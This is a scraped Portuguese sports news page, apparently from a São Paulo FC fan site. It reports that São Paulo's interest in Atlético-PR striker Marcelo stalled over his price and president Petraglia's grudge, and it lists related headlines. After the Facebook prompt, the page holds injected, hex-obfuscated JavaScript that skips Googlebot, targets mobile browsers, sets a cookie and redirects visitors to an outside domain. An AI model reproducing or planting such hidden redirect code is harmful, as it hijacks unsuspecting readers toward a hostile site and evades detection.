Destaque Inferior

SP consulta Marcelo, do Atlético-PR, mas esbarra em preço e Petraglia

//

O gerente de futebol do São Paulo, Gustavo Vieira de Oliveira, consultou os representantes do atacante Marcelo, do Atlético-PR, sobre a viabilidade de uma transferência para o Morumbi em janeiro de 2014, mas já ouviu resposta negativa. Além do alto preço que pede a diretoria do Atlético-PR, que já seria obstáculo grande o bastante para o São Paulo, ouviu que o presidente Mario Celso Petraglia não aceita negociar com o clube de Juvenal Juvêncio, com quem criou ferrenha rivalidade nos últimos anos.

O Atlético-PR não pretende vender Marcelo para outros clubes do Brasil. A diretoria fala em renovar o contrato do atacante – atual vínculo vai até janeiro de 2015 – para negociá-lo no futuro com o futebol europeu. Não há preço estipulado pelo jogador, mas as partes envolvidas avaliam que hoje apenas uma proposta do exterior por valor igual ou superior a 10 milhões de euros (R$ 32 milhões) poderia fazer o Atlético-PR romper o contrato.

Esse foi o preço passado para o São Paulo, que ainda ouviu que Fluminense e Internacional também consultaram a possibilidade de contratar Marcelo, eleito pela CBF a revelação do último Brasileirão. A diretoria do Corinthians disse que riscou o nome do atacante da lista de reforços para 2014, por conta dos altos valores. O atacante tem 10% de seus próprios direitos econômicos, e 90% pertencem ao Atlético-PR.

A má relação com Mario Celso Petraglia determinou que não há possibilidade de negociação. O presidente do Atlético-PR guarda mágoa do clube paulista até hoje por conta de diferentes episódios. A principal é o veto à Arena da Baixada na final da Copa Libertadores de 2005, imposto pela Conmebol após pedido do São Paulo. O Atlético-PR jogou o primeiro confronto da decisão no Beira-Rio, empatou por 1 a 1, e depois foi goleado no Morumbi, por 4 a 0. Até hoje Petraglia diz que teria comemorado o título da Libertadores daquele ano não fosse o veto a seu estádio.

 

marcelo-comemora-um-de-seus-dois-gols-na-vitoria-do-atletico-pr-sobre-o-boa-1346792166035_615x300

 

Em outubro, em entrevista à ESPN Brasil, o presidente do Atlético-PR relembrou o episódio e se referiu ao São Paulo como “bambinhos”: “Se não fossem as forças ocultas nós teríamos sido campeões da Libertadores. Porque nos tiraram na mão grande, de uma forma vil, do nosso estádio para jogar a final. Nós tínhamos os 40 mil lugares, eu tenho todos certificados. Da polícia, do CREA, dos bombeiros, certificando a capacidade. Por força de “instruciones superiores”, fomos jogar no Beira-Rio. Não foi o estádio, foi a desmoralização que nos fez perder. Dois meses depois, os bambinhos foram lá e tomaram de 4″, falou Petraglia, em entrevista à emissora.

A polêmica transferência do atacante Dagoberto, do Atlético-PR para o São Paulo, em 2007, é outro ponto que aborrece Petraglia. A negociação do jogador com o São Paulo foi longa, e a relação do atleta com o Atlético-PR – clube que o revelou – se desgastou a partir do momento que Dagoberto comprou briga judicial para deixar o clube. Avisou que sairia ao fim de seu contrato, mas o Atlético-PR conseguiu liminar para estender o vínculo até 2008. No início de 2007, o próprio atleta e seus empresários pagaram a multa rescisória e firmaram o acordo com o São Paulo.

Sem Marcelo, descartado, o São Paulo continua a busca por contratações para o setor ofensivo. A diretoria vê como prioridade a chegada de pelo menos dois reforços para disputarem vagas no setor ofensivo do time titular – um atacante de velocidade, para jogar pelas laterais, e um centroavante. O volante Jucilei, do Anzhi Makhachkala (RUS), é avaliado em 5 milhões de euros (R$ 16 milhões) e é alvo do São Paulo, que busca maneiras de conseguir os recursos para selar a transferência. Jucilei já avisou aos russos que não renovará seu contrato, que termina em dezembro de 2014, e poderá assinar acordo com outros clubes a partir de julho do ano que vem caso não seja vendido nesta janela.

Fonte:uol
Faça parte de nossa rede. Curta nossa pagina no Facebook, clicando aqui!}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Destaque Inferior

Mais em Destaque Inferior

Milton Cruz dá mérito de vitória a Osorio: “Estudou o Cruzeiro”

saopauloadmin27 de julho de 2015

Sem reforços, São Paulo veta até saída de atacante e assume ficar sem opção

saopauloadmin8 de janeiro de 2014

São Paulo bate bola e volta a suar no segundo dia de pré-temporada

saopauloadmin7 de janeiro de 2014

Tricolor inicia os trabalhos de olho em 2014

saopauloadmin6 de janeiro de 2014

Juvenal explica saída de atacante e faz mistério sobre reforços: ‘Só Deus sabe’

saopauloadmin4 de janeiro de 2014

Empresário nega proposta do São Paulo por Fabrício e não acredita em negociação

saopauloadmin3 de janeiro de 2014

Internacional reafirma interesse em atacante, do São Paulo

saopauloadmin1 de janeiro de 2014

Com liberação de atacante, São Paulo volta a cogitar permanência de Welliton

saopauloadmin30 de dezembro de 2013

Com aval são-paulino, assinatura separa Aloísio do futebol chinês

saopauloadmin27 de dezembro de 2013